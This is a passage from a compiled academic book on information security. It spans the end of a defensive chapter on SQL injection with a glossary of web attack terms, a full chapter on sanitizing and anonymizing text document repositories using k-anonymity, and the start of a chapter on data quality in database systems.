alter, or destroy sensitive data. Unfortunately, the security model used in many Web applications assumes that an SQL query is a trusted command. This enables attackers to exploit SQL queries to circumvent access controls, authentication, and authorization checks. In some instances, SQL queries may also allow access to host operating system level commands. How to perform the SQL code poisoning attack by using Web applications’ forms or URLs and how to prevent it by securing the input provided by the user have been shown. The best way to provide a defense against SQL code poisoning attack is to filter extensively any input that a user may type and “remove everything but the known good data.” This will ensure that only what should be entered in the field will be submitted to the server. However, it is not always possible to guard against every type of SQL code poisoning attack. In any case, it is required that the developer be informed of the various types of attacks in order to be able to plan ways to fight them. Sensitive to SQL code poisoning are the Oracle database, IBM DB2, Microsoft SQL server, MySQL, PostgreSQL to mention but a few database servers. In other words, SQL code poisoning is a real threat and no DBMS is safe from, or invulnerable to this attack.
REFERENCES Andrews, C., Litchfield, D., Grindlay, B., & NGS Software. (2003). SQL server security. McGrawHill/Osborne. Anupam, V., & Mayer, A. (1998). Security of web browser scripting languages: Vulnerabilities, attacks, and remedies. In Proceedings of the 7th USENIX Security Symposium (pp. 187-200). Axelsson, S. (2000). Intrusion detection systems: A survey and taxonomy (Tech. Rep. No. 99-15). Chalmers University.
2126
Boyd, S., & Keromytis, A. (2004, June 8-11). SQLrand: Preventing SQL injection attacks. In Proceedings of the Second Applied Cryptography and Network Security (ACNS) Conference, Yellow Mountain, China (LNCS 2121, pp. 292-302). Heidelberg, Germany: Springer-Verlag. Breidenbach, B. (2002). Guarding your website against SQL injection attacks (e-book). Apress. Cerrudo, C. (2004). Manipulating Microsoft SQL server using SQL injection (Tech. Rep.). Application Security, Inc. CERT. (2002). CERT vulnerabilit y note VU#282403. Retrieved from http://www.kb.cert. org/vuls/id/282403 Mookhey, K. K., & Burghate, N. (2003). Detection of SQL injection and cross-site scripting attacks (Tech. Rep.). Retrieved from http://www. securityfocus.com/infocus/1768 Peikary, C., & Fogie, S. (2003). Guarding against SQL server attacks: Hacking, cracking and protection techniques (Tech. Rep.). AirScanner. Spett, K. (2002). SQL injection: s your Web application vulnerable? (Tech. Rep.). SPI Dynamics Inc. Theriault, M., & Newman, A. (2001). Oracle security handbook. In Firewalls and oracle. Osborne/McGraw-Hill. Wagner, D., & Dean, D. (2001). Intrusion detection via static analysis. In Proceedings of the IEEE Symposium on Security and Privacy, Washington, DC (pp. 156-169).
KEY TERMS Anomaly Detection: This is the process of using specialized software to examine computer log files and discover information or activity that are
SQL Code Poisoning
out of place, and thus suspicious. It usually seeks only to identify all “known good” behaviours and assumes that everything else is bad. It has the potential to detect attacks of all kinds—including “unknown” attacks on custom code.
The DBA has permission to run any command that may be executed by the DBMS and is ordinarily responsible for maintaining system security, including access by users to the DBMS itself and performing backup and restoration functions.
Cookie Poisoning: Is the modification of a cookie (which is personal information in a Web user’s computer) by an attacker to gain unauthorized information about the user. The attacker may use the information to open new accounts or to gain access to the user’s existing Web accounts. To guard against cookie poisoning, Web applications that use them need to protect cookies (through encryption, for example) before they are sent to a user’s computer.
Database Management System (DBMS): Is a software package used to create and maintain databases. It provides a layer of transparency between the physical data and application programs.
CRLF Injection Attack: The term CRLF stands for Carriage Return (CR, ASCII 13 or ‘\r’) Line Feed (LF, ASCII 10 or ‘\n’). These are ACSII characters which display nothing on screen but are very widely used in Windows to indicate the end of the line. On UNIX systems the end of a line is indicated by the use of the Line Feed only. A CRLF injection attack occurs when a hacker manages to inject CRLF commands into the system. This kind of attack is not a technological security hole in the operating system or server software, but rather it depends on the way that a Web application is developed. Some developers are unaware of this kind of attack and leave open doors when developing Web applications, allowing hackers to inject CRLF commands. Cross-Site Scripting (or CSS) Attack: Crosssite scripting generally occurs when a dynamic Web page gathers malicious data from a user and displays the input on the page without it being properly validated. The data is usually formatted in the form of a hyperlink, which contains malicious content within it and is distributed over any possible means on the Internet. Database Administrator (DBA): Is an individual responsible for the planning, implementation, configuration, and administration of DBMSs.
Database Structured Query Language (SQL): Is the standardized query language for accessing, querying, updating, and managing data from a relational DBMS. The original version called SEQUEL (Structured English QUEry Language) was designed by an IBM research center in 1975. Directory Traversal Attack: Is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the Web server’s root directory. With a system vulnerable to directory traversal attack, an attacker can step out of the root directory and access other parts of the file system. This might give the attacker the ability to view restricted files, or even more dangerous, allow the attacker to execute powerful commands on the Web server which can lead to a full compromise of the system. Depending on how the Web site access is set up, the attacker will execute commands by impersonating themselves as the user which is associated with “the Web application.” Therefore it all depends on what the Web application user has been given access to in the system. Google Hacking Attack: Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although the Google search engine blocks some of the well known Google hacking queries, nothing stops a hacker from crawling a Web application and launching the Google
2127
SQL Code Poisoning
Hacking Database queries directly onto the crawled content. The Google Hacking Database is located at http://johnny.ihackstuff.com/index. php?module=prodreviews Secrecy; Integrity; and Availability: These are the three most important security services which ensure respectively that (a) sensitive stored information is kept hidden from others; (b) modifications to it are detectable; and, finally,
(c) information is accessible and useable upon demand by an authorized person. SQL Code Poisoning (or SQL Injection) Attack: Is a form of attack on a database-driven Web application that comes from user entry that has not been checked to see whether it is valid. The objective is to poison the database system by running malicious code that will reveal sensitive information or otherwise compromise the server.
This work was previously published in Cyber Warfare and Cyber Terrorism, edited by L. Janczewski and A. Colarik, pp. 161171, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
2128
2129
Chapter 7.10
Sanitization and Anonymization of Document Repositories Yücel Saygin Sabanci University, Turkey Dilek Hakkani-Tür AT&T Labs—Research, USA Gökhan Tür AT&T Labs—Research, USA
ABSTRACT Information security and privacy in the context of the World Wide Web (WWW) are important issues that are still being investigated. However, most of the present research is dealing with access control and authentication-based trust. Especially with the popularity of WWW as one of the largest information sources, privacy of individuals is now as important as the security of information. In this chapter, our focus is text, which is probably the most frequently seen data type in the WWW. Our aim is to highlight the possible threats to privacy that exist due to the availability of document repositories and sophisticated tools to browse and analyze these documents. We first identify possible threats to privacy in document
repositories. We then discuss a measure for privacy in documents with some possible solutions to avoid or, at least, alleviate these threats.
INTRODUCTION Information has been published in various forms throughout the history, and sharing information has been one of the key aspects of development. The Internet revolution and World Wide Web (WWW) made publishing and accessing information much easier than it used to be. However, widespread data collection and publishing efforts on the WWW increased the privacy concerns since most of the gathered data contain private information. Privacy of individuals on the WWW
Sanitization and Anonymization of Document Repositories
may be jeopardized via search engines and browsers or sophisticated text mining tools that can dig through mountains of Web pages. Privacy concerns need to be addressed since they may hinder data collection efforts and reduce the number of publicly available databases that are extremely important for research purposes such as in machine learning, data mining, information extraction/retrieval, and natural language processing. In this chapter, we consider the privacy issues that may originate from publishing data on the WWW. Since text is one of the most frequently and conveniently used medium in the WWW to convey information, our main focus will be text documents. We basically tackle the privacy problem in two phases. The first phase, referred to as sanitization, aims to protect the privacy of the contents of the text against possible threats. Sanitization basically deals with the automatic identification of named entities such as sensitive terms, phrases, proper names, and numeric values (e.g., credit card numbers) in a given text, and modification of them with the purpose of hiding private information. The second phase, called anonymization, makes sure that the classification tools cannot predict the owner or author of the text. In the following sections, we first provide the taxonomy of possible threats. In addition to that, we propose a privacy metric for document databases based on the notion of k-anonymity together with a discussion of the methods that can be used for preserving privacy.
BACKGROUND AND RELATED WORK Privacy and security issues were investigated in the database community in the context of statistical databases, where the users are limited to statistical queries. In statistical databases, privacy is protected by limiting the queries that can be
2130
issued by the user to non-confidential values, or statistical operations (Adam & Wortmann, 2004). Security leaks resulting from the intersection of multiple queries are investigated, and privacy is defined by the concept of k-anonymity. A database table provides k-anonymity if it cannot be used to unambiguously identify less than k entities (Samarati & Sweeney, 1998). Currently, the data mining community is investigating how data could be mined without actually seeing the confidential values. This is called privacy preserving data mining which was introduced in Agrawal and Srikant (2000) for the case of classification model construction. Further research results have been published on various data mining models for preserving privacy (Evfimievski, Srikant, Agrawal, & Gehrke, 2002; Rizvi & Haritsa, 2002). Privacy preserving data mining on distributed data sources was another interesting research direction, which was addressed in Clifton and Kantarcioglu (2004) and Vaidya and Clifton (2004) for association rule mining and classification model construction. Another aspect of privacy issues in data mining is to protect the data against data mining algorithms. This result is due to the fact that data mining tools can be used to discover sensitive information. Hiding sensitive association rules by database sanitization is proposed in Saygin et al. (2001) and Verykios et al. (2004). Further research was conducted for data sanitization to protect the data against data mining tools (Oliveira & Zaïane, 2002, 2003). However, there is not much work about preserving privacy for natural language databases and its effects, except the studies of Ruch et al. (2000) and Sweeney (1996) who have worked on sanitization of medical reports on a limited domain. On the other hand, information extraction (IE) has been studied extensively in the natural language processing community. IE is the task of extracting particular types of entities, relations, or events from natural language text or speech. The notion of what constitutes information extraction has been heavily influenced by the
Sanitization and Anonymization of Document Repositories
Message Understanding Conferences (MUCs). The basic information extraction task of Named Entity Extraction covers marking names—and determining their types as persons, locations, or organizations—and certain structured expressions—money, percent, date, and time (Hakkani-Tur et al., 1999). An example text from the Broadcast News, whose named entities are marked, is given in Figure 1. These entities can also be marked using XML tags. It may also be useful to make HTML links of entities and coreferencing pronomials, which point to pages where summary information about the entity such as the gender of a person or further references in the text, can be listed. A task related to information extraction is the automatic authorship identification, which aims to assign authors to texts. This topic is studied mainly in linguistics, computational linguistics, and stylometrics fields beginning in the precomputer era (Oakes, 1998). Commonly used features include vocabulary of the author, usage of some typical words (mostly stopwords) and phrases, and construction style of sentences (e.g., average sentence length, part of speech tags in the first words of the sentences, most common voice, etc.). In our previous work, we have found that using just the word (unigram) frequencies, it is possible to detect the author of a newspaper article by more than 90% accuracy when the candidate set is fixed to nine authors and using about 100,000 words per author for training (Tur, 2000).
PRIVACY THREATS IN DOCUMENTS Privacy issues in document repositories arise from the fact that the text contains private information, which can be jeopardized by the adversaries who are curious to know more about individuals for various reasons. Adversaries could turn this information into advantage, such as the private information that may be published in a tabloid. Since our main concern is document repositories, the main elements we are going to consider are documents as information sources. There are also what we call Privacy Conscious Entities (PCEs) whose privacy may be jeopardized by the release of the documents. A PCE could be a person, company, or organization. Privacy concerns of PCEs may require that the identifying information of the PCE (person name, company name, etc.) should not be seen in a document since the document is related with a sensitive topic. A PCE may not want to be seen as the author of the document or appear in a document in a certain context, such as being a criminal or being in debt. A PCE may not want to be associated with another entity, such as being a friend of a convict. In doing so, the links between the documents, such as references or hyperlinks to a document, should also be taken into account. The private information in a text could be grouped into two classes, namely, explicit and implicit information. Explicit information could be the name, salary, or address of a person that
Figure 1. An example text from Broadcast News corpus. Named entities are marked: bold for dates, italics for locations, underlines for organizations and gray for person names …The o ther v ery big story of the today is in Washington where the W hite House a dministration has already been badly shaken up by the possibility that president Clinton and one of his advisors Vernon Jordan obstructed justice…
2131
Sanitization and Anonymization of Document Repositories
Table 1. Relationships among privacy threats, private information, and tools for extracting private information Type of private information Explicit Implicit
Tools that can be used by the adversary B rowsers, Editors Record Matching, Information Retrieval Data Mining Statistical Analysis
could be viewed by text editors, browsers, and can be found by search engines. Implicit information could be the characteristics of a document such as the author, the statistical properties like the frequencies of some words and punctuation marks, or usage of particular phrases that can be identified with an individual. Data mining and statistics tools are needed to reach such information. In Table 1, we listed the type of private information that could be obtained by an adversary, the tools that could be used for the corresponding private information type, and the type of threat. As shown in Table 1, we classify the privacy threats as direct and indirect. Direct threats occur due to the existence and availability of explicit information in the data such as the name of the person including some extra information regarding the salary of that person. Names of individuals, phone numbers, and salary amounts are just a few examples forming a direct threat to privacy when they are revealed to a third party. Upon the disclosure of the text data, users can see the contents using a browser or an editor. Indirect threats can be of two kinds: one is due to data integration, and the other is caused by data analysis. The former type of indirect threat is the integration of different documents in order to infer private information that cannot be revealed by each individual document when considered alone. The integration can be achieved by finding those documents that are considered “similar” based on the similarity measures defined in the context of information
2132
Type of threat D irect Via Data Integration Indirect Via Data Analysis
retrieval (Cohen, 2000). Indirect threats via data analysis, instead, are due to the application of machine learning and data mining techniques over the available data. New data mining tools, especially for text classification, can be used with a training database (which is easy to construct from news groups, etc.) to infer private information such as the author of a document.
PRESERVING PRIVACY IN DOCUMENTS In this section, we first propose a measure for privacy in document repositories using the notion of k-anonymity. We then address the privacy problem in two phases. The former phase is called sanitization. It deals with the automatic extraction of named entities such as sensitive terms, phrases, proper names, and numeric values from a given text. Extracted terms are then replaced with dummy values, or more generic terms depending on the privacy requirements. The latter phase, known as anonymization, makes sure that the classification tools cannot predict the owner or author of the text. We should note that all the sanitization and anonymization techniques can be applied to spoken language as well. For example, in the case of anonymization, the purpose may be to hide the identity of the speaker.
Sanitization and Anonymization of Document Repositories
k-Anonymity as a Privacy Measure in Documents Privacy in documents can be assessed using the notion of k-anonymity that has been heavily investigated in the context of statistical disclosure control (Samarati & Sweeney, 1998). k-anonymity is related to the identification of entities (individuals, companies, etc.) in released data where the confidential attributes are hidden [15, 19]. For example, the data in a hospital regarding patients that includes the patient name, surname, social security number (SSN), postal code (ZIP), birth date, sex, diagnosis, and the medication should not be disclosed without removing the name, surname, and SSN columns which identify a person. However, when we remove the name, surname, and SSN, one may think that ZIP, birth date, sex, diagnosis, and the medication can be safely released without the risk of privacy violation. It turns out that this is not the case because when combined with publicly available data such as a voter list, we may recover the SSN, name, and surname information from the voter list database using the ZIP, birth date, and sex columns from the released data. In tabular data sources, a set of attributes (such as the ZIP, birth date, and sex) is called quasi-identifier if it could be used in connection with public data to identify a person (Sweeney, 1996). Quasi-identifiers are used as a base for measuring the anonymity provided by the released data with respect to publicly available data sources. The degree of anonymity is called k-anonymity in general, and it is formally defined in Sweeney (1996) for tabular data as follows:
k-anonymity property makes sure that the disclosed data cannot be used to distinguish a person among a group of k or more individuals. In relational data model, which was heavily adopted by statistical database researchers, the data is structured; therefore, the attribute values related to an individual are in the same row clearly identifying their relationship to the individual. However, in case of unstructured text, a major issue is to find the terms that identify an individual, or that are related to an individual. Similar to the definition in Sweeney (2002), we define the set of named entities that relate to the same individual and that can be used to identify an entity in relation to other publicly available text as quasi-identifier named entities. Quasi-identifier named entities can be date, sex, address, and so on. We need to make sure that these terms cannot be used to differentiate between a set of entities, where the set size is k. In case of authorship detection, we need to make sure that the author of a document cannot be identified among less than k-authors to provide k-anonymity. We define k-anonymity in case of the authorship of a document as follows: Definition (k-anonymity of authorship). Let DP be a set of documents whose authors are known, DC be a set of documents whose authorship is confidential, and A be the set of authors of the documents in DP U DC . A document di DC satisfies k-anonymity of authorship with respect to DP , if DP can not be used to form a prediction model that will reduce the set of possible authors to AP where AP ⊆ A, and |AP | < k.
Text Sanitization Definition (k-anonymity). Let T(A1 , A2 , …,An ) be a table with attributes A1 through An , and QI be a quasi-identifier associated with it. T is said to satisfy k-anonymity with respect to QI if and only if each sequence of values in T[QI] appears at least with k occurrences in T[QI] where T[QI] denotes the projection on attributes QI maintaining duplicates.
The aim of sanitization is to protect the privacy of individuals given their privacy requirements. The first step of the sanitization process is to extract personally identifying information such as the name, SSN of a person, or company name if we would like to protect the privacy of a company. However, spotting the personally identifying
2133
Sanitization and Anonymization of Document Repositories
information may not be enough; we also need to find the quasi-identifier named entities that could be used to identify individuals by linking to other documents such as the ZIP, birth date, and gender. Sanitization depends on the corresponding task. There are three known methods for partial access to databases (Conway & Strip, 1976), which can also be used for sanitization: Value distortion alters the confidential values to be hidden with random values. Value dissociation keeps these values but dissociates them from their actual occurrence. This can be achieved, for example, by exchanging the values across sentences. Value-class membership exchanges the individual values with disjoint, mutually exhaustive classes. For example, all the proper names can be changed to a single token Name.
1. 2.
3.
The simplest form of sanitization is modifying the values of named entities or replacing them with generic tokens as in the value-class membership approach. If the named entities are not already marked using XML tags, we can utilize automatic named entity extraction methods, which are well studied in the computational linguistics
community. The concept of k-anonymity can be assured for text sanitization while determining the generic tokens. For example, people names can be generalized until they map to at least k-people. For the case of numeric values such as salary, a concept hierarchy can be exploited. The salary can be mapped to a more generic value, which refers to at least k people in a specific context. (e.g., low, average, high, and astronomic linguistic hedges in the concept hierarchy) even when quasi-identifier information is used. For the case of addresses, we can ensure that the address maps to k different people in the company or a district where at least k distinct addresses exist. The generic tokens can also preserve the non-sensitive information to ensure readability of the text. For example, the gender or identification of the people can be marked in the token for the resolution of further (pronominal) references (i.e., versus ). An even harder task would be associating references during sanitization as in the example below where is extended as . A sample text and its sanitized version is provided in Figure 2. Another example is the task of automatic call classification, which is an emerging technology for automating call centers. During the development of call routing systems, previous customer
Figure 2. A modified example text from a medical record (Tur et al., 1999) and its sanitized version Dear Dr. B lue, Your patient, Mr. John B rown, stayed in our service from 05/05/1999 to 05/08/1999. Mr. B rown, 72 year old, has been admitted to emergency on 05/05/1999. His tests for the cytomegalovirus and the EBV were negative. Therefore, Dr. George Green performed an abdominal CT scan. Mr. B rown will be followed in ambulatory by Dr. Green… Dear Dr. , Your patient, Mr. , stayed in our service from to . Mr. , 72 year old, has been admitted to emergency on . His tests for the cytomegalovirus and the EBV were negative. Therefore, Dr. performed an abdominal CT scan. Mr. will be followed in ambulatory by Dr. …
2134
Sanitization and Anonymization of Document Repositories
calls are recorded and then transcribed. A human annotator examines the transcriptions and assigns them a call-type from a set of predefined call-types. This data is then used to train automatic speech recognition and call classification components. Figure 3 presents an example dialog between an automated call center agent and a user. As it is clear from this example, these calls may include very sensitive information, such as credit card and phone numbers, that needs to be sanitized before this data can be shared or made public. One problem with text sanitization is that the performance of the state-of-the-art information extraction techniques is still far from being perfect (especially when employed for previously unseen text or domains). In order not to miss any confidential information, one may choose high recall for low precision, which may end up with more numbers of falsely sanitized portions of text. With the value-class membership approach, the missed named entities will be easy to recognize. Thus, if the named entity extraction performance is low, using value distortion or dissociation methods would be more appropriate. Another problem is the domain dependency of the confidential information. For example, some named entities may be confidential for only some domains, such as drug names in the medical reports vs. pharmaceutical company customer care center
recordings, requiring a list of the entities that should be sanitized.
Text Anonymization Text anonymization aims at preventing the identification of the author (who is also considered to be the owner) of a given text. In the case of speech, the speaker is considered to be the owner. Text anonymization is therefore necessary to protect the privacy of the authors. For example, the identity of the reviewers of scientific papers would prefer to be anonymous. This is also the case for authors of the papers in blind reviews. We know that, using a state-of-the-art classifier, it is possible to identify the author of a text with a very high accuracy. The features that can be used are the words and phrases (n-grams) in the text, the total number of tokens, total number of different word types, total number of characters, and the number of word types that occur once. We have identified through our experiments with a limited set of articles from a newspaper that each author uses a characteristic frequency distribution over words and phrases. We use k-anonymity of authorship as the privacy metric for anonymization that was defined in the k-Anonymity as a Privacy Measure in Documents section. For the anonymization process, we may assume a fixed
Figure 3. Example dialog from a automatic call center recording and its sanitized version System: How may I help you? User: Hello. This is John Smith. My phone number is 9 7 3 area code 1 2 3 9 6 8 4. I wish to have my bill, long distance bill, sent to my Discover card for payment. My Discover card number is 2 8 7 4 3 6 1 7 8 9 1 2 5 7 hundred and it expires on first month of next year.
System: How may I help you? User: Hello. This is . My phone number is . I wish to have my bill, long distance bill, sent to my for payment. My number is and it expires on .
2135
Sanitization and Anonymization of Document Repositories
set of documents such as a digital library which collects all the major works of a given set of authors. In this case, authorship information for some documents are known, and some of them are not known. However, we should also consider the case when the adversary is able to find another set of documents for the authors, for example, by searching the Internet where the number of documents that could be found is practically infinite. Text classification techniques first parse the text to obtain the features. Each document is represented as a feature vector where each feature may be represented by a real number. In case of a fixed document set, let DP be the set of documents where the authorship information is public and DA be the set of documents where the authorship information is confidential. An adversary could train a classification model using DP to predict the authorship information of a document in DA . Since DP is known and fixed, anonymization can work on both DP and DA . The basic approach for anonymization is to modify the documents in DP and DA in order to change their feature vectors so that the data mining tools cannot classify the document accurately. The most general model that an adversary may use is a classification model that returns probabilities P(aj |di ) for each author aj for a given document di . In this way, each author will have a certain probability of being an author for a specific anonymous document. The basic approach that can be used for achieving k-anonymity is to change the probability of the real author so that (s)he falls into one of top 1…k positions randomly selected among the top-k authors with highest probability. Probabilities are then changed by updating the documents in DP and DA . This process should be performed in such a way that the original meaning and coherence of the document is preserved. When DP is not fixed, then the model that could be constructed by the adversary cannot be known in advance, which complicates the anonymization process. In this case, the approach would be to update the anonymous documents in such a way that their feature vectors look alike
2136
to obscure the adversary. We can achieve this by changing the feature vectors such that at least k of the documents with different authors have the same feature vector which can be done by taking the mean of k feature vectors of documents with different authors and assigning the mean as the new feature vector. The anonymization method heavily depends on the features of the classifier used for authorship identification by the adversary. If the classifier only uses unigram word distributions, then anonymization can be achieved simply by changing the words with their synonyms or by mapping them to more generic terms as done by sanitization. If the classifier uses a different feature set, such as the distribution of the stop-words (the or by) or words from closed class part of speech (word category) tags (that is almost all words which are not noun, verb, or adjective), then revising the sentences would be a solution as in text watermarking (Atallah et al., 2002). If the classifier uses other features such as passive or active voice, specific clauses, average length of sentences, and so forth, they need to be addressed specifically. If the text anonymization task has no information about the features of the classifier adversary used, then the optimal solution would be to assume that it uses all the features we can think of and anonymize the text accordingly.
Discussion of a System for Preserving Privacy in Document Repositories A system for anonymization and sanitization is depicted in Figure 4. As can be seen in the figure, sanitization and anonymization can be viewed as a layer between the mediums of interaction with the user and document repository. Users may create a document using an editor, and upon their request, the document may be sanitized before it is stored. The same process works in the opposite direction as well. When a user wants to view a document, the document could be sanitized (if it
Sanitization and Anonymization of Document Repositories
Figure 4. Sanitization and anonymization for documents E d i t o r B r o w s
Document
Sanitized Document
Sanitization Anonymization Layer/
Sanitization Anonymization Layer/
Document
Sanitized Document
Document Repository
e r
is stored in its original form in a trusted document repository) before it could be viewed.
Data Quality Measures for Text We need to make sure that the data quality is still preserved after the sanitization. Data quality could be measured in terms of readability and the ability to use the sanitized text for the corresponding task. For example, if the data is going to be used for text classification, it is necessary to perform sanitization without deteriorating the classification performance. If the task is information retrieval, sanitization methods should not interfere with the indexing and document matching methods. Information hiding aims at inserting additional information into any kind of digital media (Katzenbeisser & Petitcolas, 2000). This information can be intended to be a concealed message to be read only by specific people and not by other parties (steganography), a code identifying/protecting the owner (watermarking), or a code identifying the receiver (fingerprinting). The availability of media in digital form made the unauthorized copying and distribution of these very easy, increasing the concerns and therefore research for protecting the copyright.
One recent study on text watermarking digitizes the sentence using its syntactic parse tree, embeds the hidden information into the tree by changing its structure, and regenerates a new sentence with the same meaning from this structure (Atallah et al., 2002). The subject of this chapter is not to insert hidden information into text, instead it is to hide the sensitive information in the text without distorting its meaning. However, evaluation measures can be shared across information hiding, sanitization, and anonymization tasks since all have the requirement that they should not change the meaning and the coherence of the original text during the update process. Possible information theoretic measures for data quality are Kullback Leiblar distance and change in conditional entropies, the details of which details can be found in Cover and Thomas (1991).
FUTURE TRENDS Standards for privacy policies and privacy preference specifications are being developed under the W3C with the Platform for Privacy Preferences (P3P) Project (http://www.w3.org/P3P/). A method for implementing the P3P standard was proposed
2137
Sanitization and Anonymization of Document Repositories
using database technology by Agrawal, Kiernan, Srikant, and Xu (2003). As a future research direction, sanitization and anonymization tools should consider the privacy preferences of users and privacy policies of data collectors. Another important aspect is the development of online techniques for sanitization and anonymization. This is becoming more important especially with the emerging portals with online e-mail scanning capabilities. Threats that occur due to data integration from multiple sources need further investigation. Simply preprocessing the data may not be enough to ensure privacy. Data integration and record linkage can be used to identify individuals from data sources sanitized by different mechanisms and different policies. For example, the same type of text collected from different sources may be released in sanitized form. However, one may sanitize the names, and one may sanitize sensitive data values due to inconsistent sanitization policies. Standardization of sanitization mechanisms and policies for specific data types is needed for ensuring privacy in large-scale distributed document repositories.
CONCLUSION In this chapter, we identified the privacy issues in document repositories and pointed out some approaches to tackle the privacy protection problem. The ideas we presented aim to identify the problem and propose some initial solutions to it combining existing technology from natural language processing and data mining. The initial ideas we presented will hopefully lead to more research in this direction and the development of tools between the users of documents and the storage medium that will ensure the privacy requirements. With the privacy issues in text identified, tools for protecting the privacy can be developed which will lead to the release of more text data without the need of money and time
2138
consuming text preprocessing done by humans. In sum, text sanitization and anonymization will ensure privacy of individuals and serve to increase the richness of data sources on the Web.
REFERENCES Adam, N.R., & Wortmann, J.C. (1989). Security-control methods for statistical databases: A comparative study. ACM Computing Surveys, 21(4), 515-556. Agrawal, R., Kiernan, J., Srikant, R., & Xu, Y. (2003). Implementing P3P using database technology. Proceedings of the 19t h International Conference on Data Engineering, March, Bangalore, India. Agrawal, R., & Srikant, R. (2000). Privacy preserving data mining. Proceedings of SIGMOD Conference (pp. 45-52). Atallah, M., Raskin, V., Hempelmann, C., Karahan, M., Sion, R., Topkara, U., & Triezenberg, K. (2002). Natural language watermarking and tamperproofing. Information Hiding, 96-212. Clifton, C., & Kantarcioglu, M. (2004). Privacypreserving distributed mining of association rules on horizontally partitioned data. IEEE Transactions on Knowledge and Data Engineering, 16(9). Cohen, W. (2000). Data integration using similarity joins and a word-based information representation language. ACM Transactions on Information Systems, 18(3), 288-321. Conway, R., & Strip, D. (1976). Selective partial access to a database. Proceedings of the ACM Annual Conference. Cover, M., & Thomas A. (1991). Elements of information theory. New York: John Wiley & Sons. Evfimievski, A., Srikant, R., Agrawal, R., & Gehrke, J. (2002). Privacy preserving mining of
Sanitization and Anonymization of Document Repositories
association rules. Proceedings of the 8t h ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (pp. 217-228). Hakkani-Tür, D., Tur, G., Stolcke, A., & Shriberg, E. (1999). Combining words and prosody for information extraction from speech. Proceedings of the EUROSPEECH’99, 6t h European Conference on Speech Communication and Technology, Budapest, Hungary. Katzenbeisser, S., & Petitcolas, F. (Ed.) (2000). Information hiding techniques for steganography and digital watermarking. Norwood, MA: Artech House. Oakes, M. (1998). Statistics for corpus linguistics. Edinburgh University Press. Oliveira, S., & Zaïane, O. (2002). Privacy Preserving Frequent Itemset Mining. Proceedings of the IEEE ICDM Workshop on Privacy, Security and Data Mining (pp. 43-54). Oliveira, S., & Zaïane, O. (2003). Protecting sensitive knowledge by data sanitization. Proceedings of the 3r d IEEE International Conference on Data Mining (ICDM’03) (pp. 613-616). Rizvi, S., & Haritsa, J. (2002). Privacy-preserving association rule mining. Proceedings of 28t h International Conference on Very Large Data Bases. Ruch, P., Baud, R.H., Rassinoux, A.M., Bouillon, P., & Robert, G. (2000). Medical document
anonymization with a semantic lexicon. Journal of American Medical Informatics Association. Samarati, P., & Sweeney, L. (1998). Protecting privacy when disclosing information: k-Anonymity and its enforcement through generalization and suppression. SRI-CSL-98-04, Computer Science Library, SRI International. Saygin, Y., Verykios, V.S., & Clifton, C. (2001). Using unknowns to prevent the discovery of association rules. SIGMOD Record, 30(4), 45-54. Sweeney, L. (1996). Replacing personally-identifying information in medical records, the Scrub System. Proceedings of the American Medical Informatics Association Meeting (pp. 333-337). Sweeney, L. (2002). k-Anonymity: A model for protecting privacy. International Journal on Uncertainty, Fuzziness and Knowledge-based Systems, 10(5), 557-570. Tur, G. (2000). Automatic authorship identification (Technical Report). Retrieved May 3, 2005, from http://www.research.att.com/~gtur/pubs. html Vaidya, J., & Clifton, C. (2004). Privacy preserving Naïve Bayes Classifier for vertically partitioned data. Proceedings of the 2004 SIAM Conference on Data Mining, Lake Buena Vista, FL. Verykios, V.S., Elmagarmid, A., Bertino, E., Saygin, Y., & Dasseni, E. (2004). Association rule hiding. IEEE Transactions on Knowledge and Data Engineering, 16(4), 434-447.
This work was previously published in Web and Information Security, edited by E. Ferrari and B. Thuraisingham, pp. 133-148, copyright 2006 by IRM Press (an imprint of IGI Global).
2139
2140
Chapter 7.11
Information Quality:
How Good are Off-the-Shelf DBMS? Felix Naumann Humboldt-Universität zu Berlin, Germany Mary Roth IBM Silicon Valley Lab, USA
ABSTRACT Commercial database management systems (DBMS) have come a long way with respect to efficiency and more recently, with respect to quality and user friendliness. Not only do they provide an efficient means to store large amounts of data and intuitive query languages to access the data, popular DBMS also provide a whole suite of tools to assess, store, manage, clean, and retrieve data in a user-friendly way. Some of these feature address database experts, others are targeted at end-users with little or even no database knowledge. The recent developments in the field of autonomic computing drive the easeof-use even further. In this chapter we study how well a typical DBMS meets the goal of providing a high-quality data storage and retrieval facility. To this end, we draw on an established set of information quality criteria and assess how well an exemplary DBMS fares. While quality criteria
are usually defined for a set of data, we extend, wherever possible, the definitions to the systems that manage this data.
THE QUALITY-IN-QUALITY-OUT PRINCIPLE Arguably the most widespread architecture to store, manage, and retrieve structured data is the relational database management system (DBMS) architecture. Starting with System R (Astrahan, 1979) of IBM, which evolved to the IBM DB2 database system, today there are many commercial systems storing petabytes of data. Other prominent examples are Oracle database,1 Microsoft’s SQL Server,2 and MySQL.3 Other data models, such as the object-oriented model or the hierarchical model are also widespread but not discussed here. The information quality provided by a database is not due to the data model itself, but to the sys-
tem carefully managing the data. Thus, database systems with other data models enjoy the same information quality properties. Research and development for DBMS follows two main directions: scalability and usability. With the growing demand to store more and more data, databases systems have scaled in the hardware they use and in the software managing the data. Additionally, administrators of databases and end-users of the data demand more and more functionality that either adds value to the DBMS or makes its use easier. In this chapter, we analyze how well modern DBMS are able to meet user demands, or at least help database administrators (DBAs) meet user demands regarding their everyday work with the DBMS or applications built on top. Here, user demands are expressed as a set of information quality criteria taken from the empirical study of Wang and Strong (1996). Information quality is a measure to assess the value of data to perform the task at hand (Wang, 1996). Other definitions mention fitness for use (Tayi, 1998) or user satisfaction (Delone, 1992). As DBMS are one of the most common means to generate, manage, and provide this data, it is worthwhile to examine how they influence the quality of the information they handle. This influence is both explicit within the core functionality of a DBMS and implicit through tools that help data providers, developers, managers, and consumers derive the most value from the data. To examine DBMS with respect to the quality of information they are able to supply, we apply a large set of IQ criteria to DBMS as an entire system. Usually, IQ criteria are used to assess the quality of information, and not the quality of a system. Addressing this mismatch, we analyze not the DBMS itself, but its ability to provide high quality data. DBMS are not the sole source of high information quality, but they are designed to at least not diminish quality. While the wellknown garbage-in-garbage-out principle holds for any system dealing with data, we postulate the quality-in-quality-out principle for modern,
